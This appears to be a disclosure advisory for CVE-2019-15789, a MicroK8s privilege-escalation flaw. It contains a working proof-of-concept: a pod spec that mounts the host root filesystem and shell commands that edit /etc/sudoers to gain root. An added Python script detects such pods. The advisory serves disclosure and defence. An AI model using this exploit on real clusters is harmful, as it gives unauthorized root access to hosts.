MicroK8s prior to v1.15.3 included a privilege escalation vulnerability, allowing a low privilege user to obtain root access to the host. MicroK8s allowed any user with access to the host to deploy a pod to the underlying Kubernetes installation. This allowed an attacker with local access to provision a privileged container and gain root access to the underlying host.
Date Released: 10/09/2019
Author: Denis Andzakovic
Project Website: https://microk8s.io/
Affected Software: MicroK8s <= v1.15.2
CVE: CVE-2019-15789
PROOF-OF-CONCEPT EXPLOIT
As low privileged users were allowed to configure the running cluster and containers therein, a malicious user could spawn a pod with complete access to the root file system, edit /etc/sudoers and escalate to root.
doi@microk8:~$ cat pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: hostmount
spec:
  containers:
  - name: shell
    image: ubuntu:latest
    command:
      - "bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /opt/root
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory
doi@microk8:~$ microk8s.kubectl apply -f pod.yaml
pod/hostmount created
doi@microk8:~$ microk8s.kubectl exec -it hostmount /bin/bash
root@hostmount:/# cd /opt/
root@hostmount:/opt# cd root/
root@hostmount:/opt/root# ls
bin dev home initrd.img.old lib64 media opt root sbin srv sys usr vmlinuz
boot etc initrd.img lib lost+found mnt proc run snap swap.img tmp var vmlinuz.old
root@hostmount:/opt/root# cd etc/
root@hostmount:/opt/root/etc# sed -i 's/ALL$/NOPASSWD: ALL/g' sudoers
root@hostmount:/opt/root/etc# cat sudoers
{...snip...}
# User privilege specification
root ALL=(ALL:ALL) NOPASSWD: ALL
# Members of the admin group may gain root privileges
%admin ALL=(ALL) NOPASSWD: ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) NOPASSWD: ALL
{...snip...}
root@hostmount:/opt/root/etc# exit
exit
doi@microk8:~$ sudo su -
root@microk8:~# id
uid=0(root) gid=0(root) groups=0(root)
The above could also be trivially achieved with a privileged container, though MicroK8s disables privileged containers by default. Note: privileged containers are enabled when Istio is installed.
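A detection-side check for the pod shown above, as an added example that is not part of the original advisory: it reads the JSON pod list returned by microk8s.kubectl get pods --all-namespaces -o json and reports containers that mount risky hostPath volumes or run privileged. The SENSITIVE path list, the function names and the sample pod list are assumptions made for illustration.

```python
import json
import posixpath
import sys

# Assumed list of host subtrees that give control of the node; extend for your hosts.
SENSITIVE = ("/etc", "/root", "/home", "/proc", "/sys", "/var/lib", "/var/run", "/var/snap")

def risky_host_path(path):
    """True if a hostPath exposes the host root, a sensitive subtree, or a parent of one."""
    norm = posixpath.normpath("/" + path.lstrip("/"))
    return norm == "/" or any(
        norm == s or norm.startswith(s + "/") or s.startswith(norm + "/") for s in SENSITIVE)

def audit_pods(pod_list):
    """Return (namespace, pod, reason) tuples for a `kubectl get pods -o json` document."""
    findings = []
    for pod in pod_list.get("items", []):
        meta, spec = pod.get("metadata", {}), pod.get("spec", {})
        ident = (meta.get("namespace", "default"), meta.get("name", "?"))
        risky = {v["name"]: v["hostPath"].get("path", "/") for v in spec.get("volumes", [])
                 if "hostPath" in v and risky_host_path(v["hostPath"].get("path", "/"))}
        for c in spec.get("initContainers", []) + spec.get("containers", []):
            if (c.get("securityContext") or {}).get("privileged"):
                findings.append(ident + (f"{c['name']}: privileged container",))
            for m in c.get("volumeMounts", []):
                if m["name"] in risky:
                    mode = "ro" if m.get("readOnly") else "rw"
                    findings.append(ident + (
                        f"{c['name']}: host {risky[m['name']]} at {m['mountPath']} ({mode})",))
    return findings

# Constructed sample: the advisory's hostmount pod plus a harmless pod, as the API returns them.
SAMPLE = json.loads("""
{"items": [
 {"metadata": {"name": "hostmount", "namespace": "default"},
  "spec": {"containers": [{"name": "shell", "image": "ubuntu:latest",
             "volumeMounts": [{"name": "root", "mountPath": "/opt/root"}]}],
           "volumes": [{"name": "root", "hostPath": {"path": "/", "type": "Directory"}}]}},
 {"metadata": {"name": "web", "namespace": "default"},
  "spec": {"containers": [{"name": "nginx", "image": "nginx",
             "volumeMounts": [{"name": "cache", "mountPath": "/cache"}]}],
           "volumes": [{"name": "cache", "emptyDir": {}}]}}
]}""")

if __name__ == "__main__":
    # Optional argument: a file saved from `microk8s.kubectl get pods --all-namespaces -o json`.
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            SAMPLE = json.load(fh)
    for ns, name, reason in audit_pods(SAMPLE):
        print(f"{ns}/{name}: {reason}")
```

Run without arguments it audits the constructed sample and reports only the hostmount pod; the emptyDir pod is not flagged.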
PATCH
The MicroK8s team addressed this vulnerability in v1.15.3 by requiring any access to the Kubernetes installation to be performed by a privileged user (e.g., through sudo or by adding the user to the microk8s group).
TIMELINE
12/06/2019 – Advisory sent to Ubuntu security mailing list.
14/06/2019 – Advisory receipt acknowledged.
16/07/2019 – Update requested.
17/07/2019 – Report confirmed by the Ubuntu team.
15/08/2019 – Update requested.
15/08/2019 – Ubuntu referenced an open pull request, introducing a requirement for all MicroK8s actions to be performed via sudo.
06/09/2019 – v1.15.3 snap added to stable.
10/09/2019 – Advisory released.